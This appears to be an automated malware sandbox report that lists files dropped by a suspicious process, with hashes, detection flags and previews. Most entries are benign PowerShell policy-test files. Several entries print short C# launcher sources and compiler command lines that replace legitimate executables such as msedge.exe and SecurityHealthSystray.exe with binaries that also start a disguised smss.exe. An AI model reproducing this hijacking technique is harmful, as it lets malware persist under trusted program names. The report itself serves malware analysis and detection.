Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1pzxbyo.r2s.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgzofhdv.m4t.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmglmfef.yzf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0bfgvnf.5gy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jo54dsp5.rzk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuswmihw.de1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lum1ryel.kec.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n4dihuvn.g41.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_na10pffe.a4q.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3jekovy.kab.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odnozjf5.zcg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohavnl2l.soz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5lpc4ih.1bx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhrdp2ut.mlt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whwj3pxn.451.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlnbrfjv.pku.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x15l4zfy.2zi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgnqpeu0.nlz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.0.cs

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	381
Entropy (8bit):	4.872664491261153
Encrypted:	false
SSDEEP:	6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2hWD5TxxaiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLdq
MD5:	0D6398AB7A29F293B4B004972BC96CA9
SHA1:	57BEF97C673B50D31E68DE9C39F5C2C09D6ECCEE
SHA-256:	579B277C313C12CCFC5674BB45566DE3CAB37C86FDEA292B330A91B338B3BFF5
SHA-512:	A9E6B15682D9FC3535F6611B360A900DC04E558480B1CA0BD69559F75FEA33E96CCBED7A37D01BFEE27D81FFF9442EC53332195100F1A82CBD0AB3C41582144E
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\Default\Pictures\smss.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.cmdline

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	253
Entropy (8bit):	5.123122794609391
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723fOT/4TEA:Hu7L//TRq79cQnaKdA
MD5:	CE5F01435071D54248D8B0E4630583AA
SHA1:	85FFF2E3E30AB9153CFC81B3ABE58F3287163428
SHA-256:	FAC23F82E47A75B61457A40F670AA24C6E237DD89F6A0AE61F5EE788FC7B2ACC
SHA-512:	BD1EBC12C6ADD3D4353B45D87644E7CBBD17354A25F700224D8E97C77F11CAF206A1E5C1B93504FB1C81FB30A8C765633816ADB709CA0157F20BB721DABBA268
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.0.cs"

C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.out

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (339), with CRLF, CR line terminators
Category:	modified
Size (bytes):	760
Entropy (8bit):	5.259097004623664
Encrypted:	false
SSDEEP:	12:mTgm9I/u7L//TRq79cQnaKd1KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:Dm9I/un/Vq79tnaK/Kax5DqBVKVrdFAw
MD5:	EA35FBDA1C104121869C281A018C1E4B
SHA1:	361741F4D095C475F2B16EDC712B457AB33ED02C
SHA-256:	58F6DF81527713A5CFAC3420F8C9E212632AB09DB2EF6F59CF64293F00F2DC74
SHA-512:	2415D74580C84812D4646CFDE2850280595FD4654431CDE60117605FEE69EE0F584707C6BC1A037C7CBD0C09167F4A0B85609616BA46C743C1B5FC1E06EBB97A
Malicious:	false
Preview:	.C:\portcomSurrogateRefSession> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.0.cs

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	396
Entropy (8bit):	4.917995582583316
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLdTxoiFkD:JNVQIbSfhWLzIiFkMSfhlFkD
MD5:	D6CD83243E1FE6BD6736B7A363036B76
SHA1:	437ED5C927D6922B93F80A1FCD58DA6536D09DE4
SHA-256:	0B19B8E66AE34F25B8506CDA25337511BDA226355C5F0F191190FD8CD8781ADA
SHA-512:	B04C62FFAED45479F7D2B69521F107CEF864402F1E93B3883EEB9E61E3DCB6045D021BD28D1C20B13E7086924DB6DFC47D8346699D6CDB25B5ECE055EC0A8749
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\Default\Pictures\smss.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	268
Entropy (8bit):	5.113508747812771
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723fWeiWIsb:Hu7L//TRRzscQna+e/
MD5:	D237899EDA674E2757EDB35999D58041
SHA1:	EE741E7BB9B430530460C39E7EE8B857908233A8
SHA-256:	2BBD71F67D4805F4D42D167B0F3DFEDCBDCFBCFD87B5AD79DBD253B83B91CD26
SHA-512:	49B96400519770DE5CA9D0584C5C9C0E462506DA0A855B079CF0526253D5DE97EB3BA0916B69CDD70599E460C1D4F38358C16ACDFDDDBAA8E734D4E6D17D3AAD
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.0.cs"

C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.out

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (354), with CRLF, CR line terminators
Category:	modified
Size (bytes):	775
Entropy (8bit):	5.2246097196272645
Encrypted:	false
SSDEEP:	24:Dm9I/un/VRzstna+emKax5DqBVKVrdFAMBJTH:Dm9N/VRzP+emK2DcVKdBJj
MD5:	229549CB346170694FF5B128E93EED7A
SHA1:	89B1A069147F93B94C124422AD6E1D3399CB13B7
SHA-256:	63E7E9AC16BF22AE898665657492CED19091F0991F81B51D5901349AD5AB415D
SHA-512:	4FF4911C051016DE2D18344BDF5A617D2E4EE481627679C0E16F5D14D123A516FBFCCF2223454497F0868B7F37C5949278C68F99F1C6D586EF99CD4CF433E56A
Malicious:	false
Preview:	.C:\portcomSurrogateRefSession> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Desktop\IxkHGSFL.log

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aRvfEXBg.log

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ubytutlp.log

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\System32\CSCE93499D36A1149A8864C8A5B6E525A2.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. 